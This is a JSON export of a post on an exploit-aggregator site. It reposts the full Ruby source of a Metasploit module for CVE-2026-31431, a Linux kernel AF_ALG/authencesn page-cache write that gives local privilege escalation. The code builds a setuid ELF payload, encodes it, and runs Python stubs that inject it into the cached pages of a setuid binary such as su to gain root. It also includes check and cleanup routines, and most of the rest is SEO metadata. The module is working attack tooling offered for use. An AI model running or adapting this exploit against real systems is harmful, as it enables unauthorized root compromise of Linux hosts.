{"id":50773,"date":"2026-05-01T14:41:43","date_gmt":"2026-05-01T14:41:43","guid":{"rendered":"http:\/\/localhost\/?p=50773"},"modified":"2026-05-01T14:41:43","modified_gmt":"2026-05-01T14:41:43","slug":"copy-fail-afalg-authencesn-page-cache-write","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50773","title":{"rendered":"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-01T19:28:02&#8243;,&#8221;description&#8221;:&#8221;CVE-2026-31431 is a logic flaw in the Linux kernel&#8217;s authencesn AEAD template that, when reached via the AFALG socket interface combined with splice, allows an unprivileged local user to perform a controlled 4-byte write into the page cache of any&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-01T19:01:25&#8243;,&#8221;modified&#8221;:&#8221;2026-05-01T19:01:25&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Copy Fail AF_ALG + authencesn Page-Cache Write&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-31431&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n  Rank = ExcellentRanking\\n\\n  prepend Msf::Exploit::Remote::AutoCheck\\n  include Msf::Post::Architecture\\n  include Msf::Post::Process\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Copy Fail AF_ALG + authencesn Page-Cache Write&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          CVE-2026-31431 is a logic flaw in the Linux kernel&#8217;s authencesn AEAD template that, when reached via the\\n          AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled\\n          4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the\\n          on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local\\n          privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as \/usr\/bin\/su.\\n          The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and\\n          affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.\\n        },\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2026-31431&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/copy.fail\/&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/theori-io\/copy-fail-CVE-2026-31431\/blob\/main\/copy_fail_exp.py&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/rootsecdev\/cve_2026_31431&#8217;]\\n        ],\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Xint Code&#8217;,\\n          &#8216;rootsecdev&#8217;, # cleanup technique and additional PoC\\n          &#8216;Spencer McIntyre&#8217;, # metasploit module\\n          &#8216;Diego Ledda&#8217; # metasploit module\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2026-04-29&#8217;,\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;SessionTypes&#8217; =\\u003e [&#8216;shell&#8217;, &#8216;meterpreter&#8217;],\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            # the payload is a linux command but the target must be a supported architecture (have an exec payload and\\n            # PrependSetuid support)\\n            &#8216;Linux Command&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e [&#8216;linux&#8217;, &#8216;unix&#8217;],\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n              # Space is constrained due to the max size of the resulting ELF executable (2024 on 6.8.0-79-generic\\n              # x86_64, 2036 on 6.6.63-v8+ aarch64) if Metasploit changes the ELF executable size in the future, this\\n              # may need to be updated\\n              &#8216;Payload&#8217; =\\u003e { &#8216;Space&#8217; =\\u003e 1847, &#8216;DisableNops&#8217; =\\u003e true }\\n            }\\n          ]\\n        ],\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;AKA&#8217; =\\u003e [&#8216;Copy Fail&#8217;],\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e []\\n        }\\n      )\\n    )\\n  end\\n\\n  def check\\n    stub_source = File.read(File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2026-31431&#8217;, &#8216;CVE-2026-31431-check.py&#8217;))\\n    begin\\n      output = run_python_stub(stub_source)\\n    rescue Msf::Exploit::Failed =\\u003e e\\n      return CheckCode::Unknown(\\&#8221;The exploit check failed: #{e}\\&#8221;)\\n    end\\n\\n    last_error = nil\\n    output.split(\\&#8221;\\\\n\\&#8221;).each do |line|\\n      if line.start_with?(&#8216;[-] &#8216;)\\n        print_error(last_error) if last_error\\n        last_error = line[4&#8230;]\\n      elsif line.start_with?(&#8216;[+] &#8216;)\\n        print_good(line[4&#8230;])\\n      elsif line.start_with?(&#8216;[*] &#8216;)\\n        print_status(line[4&#8230;])\\n      else\\n        print_line(line)\\n      end\\n    end\\n\\n    return CheckCode::Safe(last_error) if last_error\\n\\n    begin\\n      result = run_command(&#8216;id&#8217;)\\n    rescue Msf::Exploit::Failed =\\u003e e\\n      return CheckCode::Unknown(\\&#8221;The exploit check failed: #{e}\\&#8221;)\\n    end\\n\\n    return CheckCode::Vulnerable if result =~ \/uid=0(\\\\(\\\\w+\\\\))?\/\\n\\n    CheckCode::Safe(&#8216;The target system is not exploitable.&#8217;)\\n  end\\n\\n  def find_exec_program\\n    %w[python python3 python2].select(\\u0026method(:command_exists?)).first\\n  end\\n\\n  def exploit\\n    run_command(payload.encoded)\\n  end\\n\\n  def run_python_stub(stub_source, *args)\\n    python_binary = @python_binary || find_exec_program\\n    fail_with(Failure::NotFound, &#8216;The python binary was not found.&#8217;) unless python_binary\\n\\n    if @python_binary.nil?\\n      vprint_status(\\&#8221;Using &#8216;#{python_binary}&#8217; on the remote target.\\&#8221;)\\n      @python_binary = python_binary\\n    end\\n\\n    stub = Msf::Payload::Python.create_exec_stub(stub_source)\\n\\n    create_process(\\n      &#8216;\/bin\/sh&#8217;,\\n      args: [&#8216;-c&#8217;, \\&#8221;echo #{Shellwords.escape(stub)} | exec #{python_binary} &#8211; \\\\\\&#8221;$@\\\\\\&#8221;\\&#8221;, &#8216;-&#8216;] + args\\n    )\\n  end\\n\\n  def run_command(os_command)\\n    os_architecture = get_os_architecture\\n\\n    unless [ ARCH_X64, ARCH_AARCH64 ].include?(os_architecture)\\n      # this is an artificial filter for MVP while the details for the other architectures are worked out and tested.\\n      fail_with(Failure::NoTarget, \\&#8221;#{os_architecture} targets are not supported.\\&#8221;)\\n    end\\n\\n    cmd_payload = framework.payloads.create(\\&#8221;linux\/#{os_architecture}\/exec\\&#8221;)\\n    fail_with(Failure::NoTarget, \\&#8221;#{os_architecture} targets are not supported.\\&#8221;) if cmd_payload.nil? || !cmd_payload.options.key?(&#8216;PrependSetuid&#8217;)\\n\\n    cmd_payload.datastore[&#8216;CMD&#8217;] = os_command\\n    cmd_payload.datastore[&#8216;PrependSetuid&#8217;] = true\\n    elf = cmd_payload.generate_simple(&#8216;Format&#8217; =\\u003e &#8216;elf&#8217;)\\n\\n    # this is useful for determining the max size that can be written by the exploit\\n    vprint_status(\\&#8221;Generated a #{elf.size} byte ELF executable&#8230;\\&#8221;)\\n\\n    print_status(&#8216;Triggering the vulnerability using Python&#8230;&#8217;)\\n    stub_source = File.read(File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2026-31431&#8217;, &#8216;CVE-2026-31431.py&#8217;))\\n    run_python_stub(stub_source, ::Base64.strict_encode64(Zlib::Deflate.deflate(elf)))\\n  end\\n\\n  def cleanup\\n    # cleanup technique to restore su to the original behavior courtesy of\\n    # https:\/\/github.com\/rootsecdev\/cve_2026_31431\/blob\/f288952034d0d1b21c035d178c7a485dcf6a3618\/exploit_cve_2026_31431.py#L183-L187\\n    stub_source = File.read(File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2026-31431&#8217;, &#8216;CVE-2026-31431-cleanup.py&#8217;))\\n    run_python_stub(stub_source)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/local\/cve_2026_31431_copy_fail.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/local\/cve_2026_31431_copy_fail\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-01T19:28:02&#8243;,&#8221;description&#8221;:&#8221;CVE-2026-31431 is a logic flaw in the Linux kernel&#8217;s authencesn AEAD template that, when reached via the AFALG socket interface combined with splice, allows an&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,169,13,7,11,5],"class_list":["post-50773","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50773\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-01T19:28:02&#8243;,&#8221;description&#8221;:&#8221;CVE-2026-31431 is a logic flaw in the Linux kernel&#8217;s authencesn AEAD template that, when reached via the AFALG socket interface combined with splice, allows an...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50773\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-01T14:41:43+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50773#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50773\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL-\",\"datePublished\":\"2026-05-01T14:41:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50773\"},\"wordCount\":1130,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50773#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50773\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50773\",\"name\":\"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-01T14:41:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50773#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50773\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50773#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50773","og_locale":"en_US","og_type":"article","og_title":"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-05-01T19:28:02&#8243;,&#8221;description&#8221;:&#8221;CVE-2026-31431 is a logic flaw in the Linux kernel&#8217;s authencesn AEAD template that, when reached via the AFALG socket interface combined with splice, allows an...","og_url":"https:\/\/zero.redgem.net\/?p=50773","og_site_name":"zero redgem","article_published_time":"2026-05-01T14:41:43+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50773#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50773"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL-","datePublished":"2026-05-01T14:41:43+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50773"},"wordCount":1130,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50773#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50773","url":"https:\/\/zero.redgem.net\/?p=50773","name":"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-01T14:41:43+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50773#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50773"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50773#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Copy Fail AF_ALG + authencesn Page-Cache Write_MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50773","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50773"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50773\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50773"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50773"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50773"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}